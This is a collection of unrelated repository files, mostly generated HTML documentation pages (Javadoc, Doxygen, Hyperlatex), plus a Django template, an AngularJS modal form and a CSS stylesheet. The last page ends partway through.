Vincent</a>.</em></p> <p><em>This program is free software; you can redistribute it and/or modify it under the terms of the <a href='http://www.gnu.org/copyleft/gpl.html'>GNU General Public License</a> as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.</em></p> </BODY> </HTML>
doc/UserManual/html/UserManual_35.html
MindBuffer/tao
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <!-- HTML file produced from file: UserManual.tex -- -- using Hyperlatex v 2.3.1 (c) Otfried Cheong-- -- on Emacs 21.1 (patch 4) "Arches" XEmacs Lucid, Sun Apr 30 20:49:56 2000 --> <HEAD> <TITLE>Tao User Manual -- Getting Started</TITLE> <link rel=stylesheet href="../../taomanual.css" type="text/css"> </HEAD><BODY BACKGROUND="bg.gif"> <table width="500" border="0" align="left" cellspacing="2" cellpadding="2"><tr><td class="nav" valign="top"><!-- top panel --><A HREF="UserManual.html"><IMG ALT="Up" ALIGN=BOTTOM BORDER=0 SRC="up.gif"></A> <BR><A HREF="UserManual.html">Top</A><BR><IMG width="167" height="1" SRC="trans1x1.gif"> </td><td class="nav" valign="top"><A HREF="UserManual_34.html"><IMG ALT="Back" ALIGN=BOTTOM BORDER=0 SRC="back.gif"></A> <BR><A HREF="UserManual_34.html">Pitches and Frequencies</A><BR><IMG width="167" height="1" SRC="trans1x1.gif"> </td><td class="nav" valign="top"><A HREF="UserManual_36.html"><IMG ALT="Forward" ALIGN=BOTTOM BORDER=0 SRC="forward.gif"></A> <BR><A HREF="UserManual_36.html">Writing a script</A><BR><IMG width="167" height="1" SRC="trans1x1.gif"> </td></tr><!-- end top panel --><tr><td colspan="3" class="main"><!-- main text --><br><br> <H1>Getting Started</H1> In this section we look at a typical session with <B>Tao</B> from beginning to end. I will assume that you have successfully installed the package and that the test script worked OK. <P><MENU> <LI><A HREF="UserManual_36.html">Writing a script</A> <LI><A HREF="UserManual_37.html">Executing the script</A> <LI><A HREF="UserManual_38.html">The output of the `tao' command</A> <LI><A HREF="UserManual_39.html">Moving the image in the visualisation window</A> <LI><A HREF="UserManual_40.html">Quitting the synthesis before the performance finishes</A> <LI><A HREF="UserManual_41.html">Post-processing the output files</A> </MENU> <BR></td></tr><!-- end main text --><tr><td class="nav" align="left" valign="top"><!-- bottom matter --><A HREF="UserManual.html"><IMG ALT="Up" ALIGN=BOTTOM BORDER=0 SRC="up.gif"></A> <BR><A HREF="UserManual.html">Top</A><BR><IMG width="167" height="1" SRC="trans1x1.gif"> </td><td class="nav" align="left" valign="top"><A HREF="UserManual_34.html"><IMG ALT="Back" ALIGN=BOTTOM BORDER=0 SRC="back.gif"></A> <BR><A HREF="UserManual_34.html">Pitches and Frequencies</A><BR><IMG width="167" height="1" SRC="trans1x1.gif"> </td><td class="nav" align="left" valign="top"><!-- bottom matter --><A HREF="UserManual_36.html"><IMG ALT="Forward" ALIGN=BOTTOM BORDER=0 SRC="forward.gif"></A> <BR><A HREF="UserManual_36.html">Writing a script</A> <IMG width="167" height="1" SRC="trans1x1.gif"> </td></tr><!-- end bottom matter --> <tr><td colspan="3" class="addr"><!-- bottom panel --><ADDRESS><FONT SIZE=-1>&#169;1999,2000 Mark Pearson <A HREF="mailto:m.pearson@ukonline.co.uk">m.pearson@ukonline.co.uk</A> April 30, 2000</ADDRESS><BR></td></tr><!-- end bottom panel --></table></BODY></HTML>
blog/templates/user_home.html
ravimalik20/blogApp
{%extends "base.html"%} {%block title%} User Home : {{user.username}} {%endblock%} {%block main_body%} {%if user %} <h1>{{user.username}}</h1> <h2>List of blogs of {{user.username}}</h2> {%for i in user.blog_owner.all%} <ul> <li> <p>{{i.title}}</p> <a href="/blog/{{i.getCompleteURL}}/">view</a> {%ifequal user.pk i.owner.pk%} <a href="/blog/{{i.getCompleteURL}}/post/">Make a Post</a> {%endifequal%} </li> </ul> {%endfor%} {%else%} Not working {%endif%} {%ifequal user curr_user%} <a href="/blog/new/">Create a Blog</a> {%endifequal%} {%endblock%}
doc/br/com/dazen/model/types/Ranking.html
CharlesQueiroz/NFValidator
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_25) on Wed Aug 07 11:50:45 BRT 2013 --> <title>Ranking</title> <meta name="date" content="2013-08-07"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Ranking"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Ranking.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../br/com/dazen/model/types/Operation.html" title="enum in br.com.dazen.model.types"><span class="strong">Prev Class</span></a></li> <li>Next Class</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?br/com/dazen/model/types/Ranking.html" target="_top">Frames</a></li> <li><a href="Ranking.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum_constant_summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum_constant_detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">br.com.dazen.model.types</div> <h2 title="Enum Ranking" class="title">Enum Ranking</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Enum&lt;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>&gt;</li> <li> <ul class="inheritance"> <li>br.com.dazen.model.types.Ranking</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable, java.lang.Comparable&lt;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>&gt;</dd> </dl> <hr> <br> <pre>public enum <span class="strong">Ranking</span> extends java.lang.Enum&lt;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>&gt;</pre> <div class="block">Enum que representa as classificações das vendas realizadas.</div> <dl><dt><span class="strong">Author:</span></dt> <dd>Charles Queiroz - charles@dazen.com.br | (85) 9933-1585</dd></dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_summary"> <!-- --> </a> <h3>Enum Constant Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Enum Constant Summary table, listing enum constants, and an explanation"> <caption><span>Enum Constants</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Enum Constant and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#A">A</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#ANY">ANY</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#B">B</a></strong></code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#C">C</a></strong></code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#D">D</a></strong></code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a></code></td> <td class="colLast"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#valueOf(java.lang.String)">valueOf</a></strong>(java.lang.String&nbsp;name)</code> <div class="block">Returns the enum constant of this type with the specified name.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>[]</code></td> <td class="colLast"><code><strong><a href="../../../../../br/com/dazen/model/types/Ranking.html#values()">values</a></strong>()</code> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Enum"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Enum</h3> <code>compareTo, equals, getDeclaringClass, hashCode, name, ordinal, toString, valueOf</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>getClass, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ ENUM CONSTANT DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_detail"> <!-- --> </a> <h3>Enum Constant Detail</h3> <a name="A"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>A</h4> <pre>public static final&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a> A</pre> </li> </ul> <a name="B"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>B</h4> <pre>public static final&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a> B</pre> </li> </ul> <a name="C"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>C</h4> <pre>public static final&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a> C</pre> </li> </ul> <a name="D"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>D</h4> <pre>public static final&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a> D</pre> </li> </ul> <a name="ANY"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>ANY</h4> <pre>public static final&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a> ANY</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="values()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>values</h4> <pre>public static&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>[]&nbsp;values()</pre> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared. This method may be used to iterate over the constants as follows: <pre> for (Ranking c : Ranking.values()) &nbsp; System.out.println(c); </pre></div> <dl><dt><span class="strong">Returns:</span></dt><dd>an array containing the constants of this enum type, in the order they are declared</dd></dl> </li> </ul> <a name="valueOf(java.lang.String)"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>valueOf</h4> <pre>public static&nbsp;<a href="../../../../../br/com/dazen/model/types/Ranking.html" title="enum in br.com.dazen.model.types">Ranking</a>&nbsp;valueOf(java.lang.String&nbsp;name)</pre> <div class="block">Returns the enum constant of this type with the specified name. The string must match <i>exactly</i> an identifier used to declare an enum constant in this type. (Extraneous whitespace characters are not permitted.)</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>name</code> - the name of the enum constant to be returned.</dd> <dt><span class="strong">Returns:</span></dt><dd>the enum constant with the specified name</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.lang.IllegalArgumentException</code> - if this enum type has no constant with the specified name</dd> <dd><code>java.lang.NullPointerException</code> - if the argument is null</dd></dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Ranking.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../br/com/dazen/model/types/Operation.html" title="enum in br.com.dazen.model.types"><span class="strong">Prev Class</span></a></li> <li>Next Class</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?br/com/dazen/model/types/Ranking.html" target="_top">Frames</a></li> <li><a href="Ranking.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum_constant_summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum_constant_detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
public_blog/wp-content/themes/theme1667/editor-style-rtl.css
webcainternet/triburguer
/* Theme Name: theme1667 */ /* Used to style the TinyMCE editor. */ html .mceContentBody{ direction:rtl; unicode-bidi:embed; float:right; } * { font-family: Arial, Tahoma, sans-serif; } /* Text elements */ ul { margin: 0 -18px 18px 0; } ol { margin: 0 -18px 18px 0; } dd { margin-right: 0; } blockquote { font-style: normal; } table { text-align: right; margin: 0 0 24px -1px; } html .mceContentBody{ direction:rtl; unicode-bidi:embed; float:right; } * { font-family: Arial, Tahoma, sans-serif; } /* Text elements */ ul { margin: 0 -18px 18px 0; } ol { margin: 0 -18px 18px 0; } dd { margin-right: 0; } blockquote { font-style: normal; } table { text-align: right; margin: 0 0 24px -1px; }
app/page/doc/nursRecordLog/modal/setNecessary/setNecessary.html
john-lius/ais_3.0
<div class="modal-header"> <h4><span>{{vm.title}}</span><span class="pull-right modal-container_close" ng-click="vm.close()">✖</span></h4> </div> <form class="form-horizontal shiftIn-baseInfo" name="BaseInfoForm" novalidate> <div class="modal-body" style="padding-right:20px;"> <div class="patient-in-modal-form-div"> <div class="form-group"> <label class="control-label col-md-offset-1"><span class="red">*</span>{{vm.content}}</label> </div> </div> <div class="patient-in-modal-form-div"> <div class="form-group"> <div class="col-md-4" style="padding-left:50px;" ng-repeat="cItem in requiredItemList"> <checkbox type="checkbox" name="daily" ng-checked="cItem.isNeed" ng-model="cItem.isNeed" ng-true-value="1" ng-false-value="0"> {{cItem.description}} </checkbox> </div> </div> </div> </div> <div ng-if="vm.errorinfo" class="text-center" style="color:red;">{{vm.errorinfo}}</div> <div class="modal-footer"> <button class="btn btn-primary" ng-disabled="BaseInfoForm.$invalid" type="button" ng-click="vm.save()">保存</button> <button class="btn btn-default" type="button" ng-click="vm.close()">取消</button> </div> </form>
doc/index.html
agrawalakhil/mod_rabbitmq
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>The mod_rabbitmq application</title> </head> <frameset cols="20%,80%"> <frame src="modules-frame.html" name="modulesFrame" title=""> <frame src="overview-summary.html" name="overviewFrame" title=""> <noframes> <h2>This page uses frames</h2> <p>Your browser does not accept frames. <br>You should go to the <a href="overview-summary.html">non-frame version</a> instead. </p> </noframes> </frameset> </html>
lib/docs/apidocs/org/apache/poi/ss/usermodel/class-use/PrintCellComments.html
setu9760/Jade_project_repo
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="ru"> <head> <title>Uses of Class org.apache.poi.ss.usermodel.PrintCellComments (POI API Documentation)</title> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.poi.ss.usermodel.PrintCellComments (POI API Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/poi/ss/usermodel/class-use/PrintCellComments.html" target="_top">Frames</a></li> <li><a href="PrintCellComments.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.apache.poi.ss.usermodel.PrintCellComments" class="title">Uses of Class<br>org.apache.poi.ss.usermodel.PrintCellComments</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.apache.poi.ss.usermodel">org.apache.poi.ss.usermodel</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="#org.apache.poi.xssf.usermodel">org.apache.poi.xssf.usermodel</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.apache.poi.ss.usermodel"> <!-- --> </a> <h3>Uses of <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a> in <a href="../../../../../../org/apache/poi/ss/usermodel/package-summary.html">org.apache.poi.ss.usermodel</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../../../org/apache/poi/ss/usermodel/package-summary.html">org.apache.poi.ss.usermodel</a> that return <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></code></td> <td class="colLast"><span class="strong">PrintCellComments.</span><code><strong><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html#valueOf(int)">valueOf</a></strong>(int&nbsp;value)</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></code></td> <td class="colLast"><span class="strong">PrintCellComments.</span><code><strong><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html#valueOf(java.lang.String)">valueOf</a></strong>(java.lang.String&nbsp;name)</code> <div class="block">Returns the enum constant of this type with the specified name.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a>[]</code></td> <td class="colLast"><span class="strong">PrintCellComments.</span><code><strong><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html#values()">values</a></strong>()</code> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"><a name="org.apache.poi.xssf.usermodel"> <!-- --> </a> <h3>Uses of <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a> in <a href="../../../../../../org/apache/poi/xssf/usermodel/package-summary.html">org.apache.poi.xssf.usermodel</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../../../org/apache/poi/xssf/usermodel/package-summary.html">org.apache.poi.xssf.usermodel</a> that return <a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">PrintCellComments</a></code></td> <td class="colLast"><span class="strong">XSSFPrintSetup.</span><code><strong><a href="../../../../../../org/apache/poi/xssf/usermodel/XSSFPrintSetup.html#getCellComment()">getCellComment</a></strong>()</code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/poi/ss/usermodel/PrintCellComments.html" title="enum in org.apache.poi.ss.usermodel">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/poi/ss/usermodel/class-use/PrintCellComments.html" target="_top">Frames</a></li> <li><a href="PrintCellComments.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright 2014 The Apache Software Foundation or its licensors, as applicable.</i> </small></p> </body> </html>
doc/TopatsIncrementMessagesGetResponse_8h_source.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.3.1"/> <title>Taobao Cpp/Qt SDK: TaoApiCpp/response/TopatsIncrementMessagesGetResponse.h Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Taobao Cpp/Qt SDK </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.3.1 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>File&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" 